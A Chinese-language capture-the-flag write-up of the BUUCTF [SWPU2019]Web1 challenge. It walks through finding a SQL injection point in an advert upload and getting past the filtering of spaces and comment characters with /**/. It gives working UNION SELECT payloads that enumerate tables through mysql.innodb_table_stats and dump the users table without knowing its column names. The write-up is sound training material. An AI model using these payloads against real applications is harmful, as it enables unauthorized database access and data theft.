146,[1]BUUCTFWEB[SWPU2019]Web1

进入靶场

先注册

试着发一个

看看源代码

 所以上传的广告应该是注入点

再上传看看

历史记录里有SQL语句，那就试试

被过滤了

从基本的开始试试

报错了

是单引号闭合

尝试看看过滤了什么

我尝试的1和空格以及1空格2，但是发现最后空格没有出现

猜测第一次传入的sql语句也没有正确传入

 

 

不过%23可以 

 

先把空格和#替换掉 

 

在union select后半部分报错了

那就先只用union select找注入点

多尝试了几次发现用（）解决过滤了空格的方法行不通

用/**/

没闭合

用注释符不行

那就闭合

 1'/**/union/**/select/**/1,2'

 

I fu le

 1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

✌

找到注入点了

1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' 

 

1'/**/union/**/select/**/1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"' 

 

1'/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'